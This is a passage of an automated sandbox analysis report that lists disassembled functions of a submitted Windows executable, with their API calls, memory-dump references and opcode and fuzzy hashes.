                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocAllocate_free
                                                                                            • String ID:
                                                                                            • API String ID: 2447670028-0
                                                                                            • Opcode ID: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
                                                                                            • Instruction ID: f97d1692e20270bea844b94e836ed730222c398d37aadc698e1799521d4ed374
                                                                                            • Opcode Fuzzy Hash: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
                                                                                            • Instruction Fuzzy Hash: B0F0F632201115B6DB216B66AD07BAF3778BF91B73F244126FD18BA191DF7CCD0985A0
                                                                                            Function 00A4109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00A410AB
                                                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A410B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                            • String ID:
                                                                                            • API String ID: 1231390398-0
                                                                                            • Opcode ID: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
                                                                                            • Instruction ID: 3fce1b2aadadd9fc557ca335a3ee28ab8bfe95571186ac41e6623e70084a9494
                                                                                            • Opcode Fuzzy Hash: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
                                                                                            • Instruction Fuzzy Hash: 28E09A7BB00149E78F0D8BA49C058AB72EDEAC42043208179E413E3101FA70EE874AA0
                                                                                            Function 00A3A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2673547680-0
                                                                                            • Opcode ID: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
                                                                                            • Instruction ID: 090f8af23d24787055c503e3b57e0f7d0a07f3ea581ef93ecffa4f92412f2af6
                                                                                            • Opcode Fuzzy Hash: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
                                                                                            • Instruction Fuzzy Hash: 2FF0ED32210219BBDF019FA0DC41FDA377CBF14385F488060BA88D61A0DB71CADAEB60
                                                                                            Function 00A3A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2643169976-0
                                                                                            • Opcode ID: 6d849aabcf0f83e4943a7536ff4594d01bfa93341c159f152ee1d01ef13445a0
                                                                                            • Instruction ID: 716328f5bd6c0cd41e865c46c9e10c93120a2b5dc7e0c0e52e7179cf260a58e7
                                                                                            • Opcode Fuzzy Hash: 6d849aabcf0f83e4943a7536ff4594d01bfa93341c159f152ee1d01ef13445a0
                                                                                            • Instruction Fuzzy Hash: FBE092361402196BDB019FA0EC45FDA776CBB18382F488021B945D2060EB61DE89DA60
                                                                                            Function 00A4AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00A62641,000000FF), ref: 00A4ACB0
                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00A62641,000000FF), ref: 00A4ACB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 3856339756-0
                                                                                            • Opcode ID: 83c6bf3d5d86836987a1c684ae76111c19dc885a29f653ef57e5b58c46047530
                                                                                            • Instruction ID: b02b41b640aa9f4e77c68ea822a32ebe76ee09911152f12528b9b0235a17e09f
                                                                                            • Opcode Fuzzy Hash: 83c6bf3d5d86836987a1c684ae76111c19dc885a29f653ef57e5b58c46047530
                                                                                            • Instruction Fuzzy Hash: 0EE06576644650EFCB01DB58DC06B45FBBCFB88B20F104366F416D37A0CB746842CA90
                                                                                            Function 00A3A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A254
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A280
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2673547680-0
                                                                                            • Opcode ID: 642bcce0524b50dc4d64c3d4fc1085234fdbe2a38ac7286dfe07fec6f409b53d
                                                                                            • Instruction ID: 984fdee1a14f53ecbd7d12950e9209b156deb5130d000a1ab7c7cb9ca26ef4bc
                                                                                            • Opcode Fuzzy Hash: 642bcce0524b50dc4d64c3d4fc1085234fdbe2a38ac7286dfe07fec6f409b53d
                                                                                            • Instruction Fuzzy Hash: A3E092369001245BCF10EBA4CD05BD9B76CAB183E2F044261FE84E31A0D770DE45CAE0
                                                                                            Function 00A4DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A4DEEC
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00A4DF03
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2718869927-0
                                                                                            • Opcode ID: 7810b5cdcc99767e1651b808405add5410d455b169be8ce4856a44c060ab24ba
                                                                                            • Instruction ID: 90f70f97287fbec5c558de1063a9b3c703f18fe2bed28b1ce51c821a1ef26178
                                                                                            • Opcode Fuzzy Hash: 7810b5cdcc99767e1651b808405add5410d455b169be8ce4856a44c060ab24ba
                                                                                            • Instruction Fuzzy Hash: A7E092B650024826DF02EBA4DD0AF9E3B6C5B05785F044861B205DA0B2DA78EA518761
                                                                                            Function 00A4081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1175261203-0
                                                                                            • Opcode ID: 00f265cc9f3485a628559c1d48d3dd436832d034d1733250e3ba9655a576036f
                                                                                            • Instruction ID: 37a20e60c4e3fb19d3ef0c779aa2ff003586beb7b149908c67c5606fa2241665
                                                                                            • Opcode Fuzzy Hash: 00f265cc9f3485a628559c1d48d3dd436832d034d1733250e3ba9655a576036f
                                                                                            • Instruction Fuzzy Hash: FFE01A768001686ADF11ABA49D49FDA7BACEF493D2F040065B649E2005DAB4DA858BB0
                                                                                            Function 00A4A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA
                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A4A3E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: BitmapCreateFromGdipStream
                                                                                            • String ID:
                                                                                            • API String ID: 1918208029-0
                                                                                            • Opcode ID: 1f2b0ad8e78753df3131bd34c30ebe1d18ed9271a8e3f3db8688fcb052e6363c
                                                                                            • Instruction ID: 1f8dd51a8b47cfb78a3dac26a01a6e466918804f6b41b95c11345f28611a2992
                                                                                            • Opcode Fuzzy Hash: 1f2b0ad8e78753df3131bd34c30ebe1d18ed9271a8e3f3db8688fcb052e6363c
                                                                                            • Instruction Fuzzy Hash: 9BE0ED79501218EBCB50DF55C54569ABBF8EB55360F10C05AE88697241E374AE04DB91
                                                                                            Function 00A52B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52BAA
                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A52BB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                            • String ID:
                                                                                            • API String ID: 1660781231-0
                                                                                            • Opcode ID: 66e3d5ab4d38b2fc577a64725c7246141b74dfe15eecf995edcd9577a1f9afd6
                                                                                            • Instruction ID: dcd84fe7da1b43e1730289daca01fdf17cf56a260c7f676eb18886d72d83ac3f
                                                                                            • Opcode Fuzzy Hash: 66e3d5ab4d38b2fc577a64725c7246141b74dfe15eecf995edcd9577a1f9afd6
                                                                                            • Instruction Fuzzy Hash: 2DD0A93A254200294C14ABB02A0274823A5BD93BB37E10A9AEC20C54C1EB30804CA312
                                                                                            Function 00A312F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3351165006-0
                                                                                            • Opcode ID: 33c5beb3bf36d76f763dcb078803c6c4985321f81aa5a1bc75befd39a670e78d
                                                                                            • Instruction ID: 053ec8b31a5703066908448942b71fc2e7a26e22cc70354ccf0f6907ccc11ad8
                                                                                            • Opcode Fuzzy Hash: 33c5beb3bf36d76f763dcb078803c6c4985321f81aa5a1bc75befd39a670e78d
                                                                                            • Instruction Fuzzy Hash: ABC0123725C200BECF018BF5DC09C2BBBB8ABA5316F24CA0AB2A5C0070CA39C110DB11
                                                                                            Function 00A31A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: b763bde0237d6b6f856e58d73e8a87b227618611c406242064050d8fd1f3b30b
                                                                                            • Instruction ID: 2f005ca85141b03e82f42715f977caca64020dc5b93c3e71e7bcd3effb0f36ff
                                                                                            • Opcode Fuzzy Hash: b763bde0237d6b6f856e58d73e8a87b227618611c406242064050d8fd1f3b30b
                                                                                            • Instruction Fuzzy Hash: FBC19F70A002549FEF15CF68C894BB9BBB5EF16310F0845BAFC469B296DB309945CB61
                                                                                            Function 00A33BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 85a29ea3aa92b59e6d8de5b5de294014b19edd6cd21342933313b9595542e950
                                                                                            • Instruction ID: 6b9f6b3aee5cbd1150a7dcf9ee274e99b13ed6b5f177ac62d2cf6b2431f7af7b
                                                                                            • Opcode Fuzzy Hash: 85a29ea3aa92b59e6d8de5b5de294014b19edd6cd21342933313b9595542e950
                                                                                            • Instruction Fuzzy Hash: 5871E176504B849EDB35DF70C941AE7B7E9AF14301F40492EF2AB87241EA326A88CF11
                                                                                            Function 00A38284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A38289
                                                                                              • Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 2506663941-0
                                                                                            • Opcode ID: 0c08daf6018bef68e224012dd0469a8bb1e44d72447f3b988822709a97c0a76c
                                                                                            • Instruction ID: fbfb23ae9375d62a59dfe9b1b649e468140d79c96635dd4aae1db32b812047eb
                                                                                            • Opcode Fuzzy Hash: 0c08daf6018bef68e224012dd0469a8bb1e44d72447f3b988822709a97c0a76c
                                                                                            • Instruction Fuzzy Hash: 724195719447589ADB20EBA0CD55AEAB3B8AF00304F4444EBF18AA7193EB755EC9CB50
                                                                                            Function 00A313E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C
                                                                                              • Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45
                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 1c6e65a73473d48141bc614a0acf203bf140fbc22333563e38dfb4e044dc44e3
                                                                                            • Instruction ID: 4691da99b42efce64f75567cea7cf01ad22eadad3a041f48c7fbd751dd2005db
                                                                                            • Opcode Fuzzy Hash: 1c6e65a73473d48141bc614a0acf203bf140fbc22333563e38dfb4e044dc44e3
                                                                                            • Instruction Fuzzy Hash: FD4136B0905B409EE724DF798985AE6FBE5BF19310F50492EE5FF83282CB726654CB10
                                                                                            Function 00A313DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C
                                                                                              • Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45
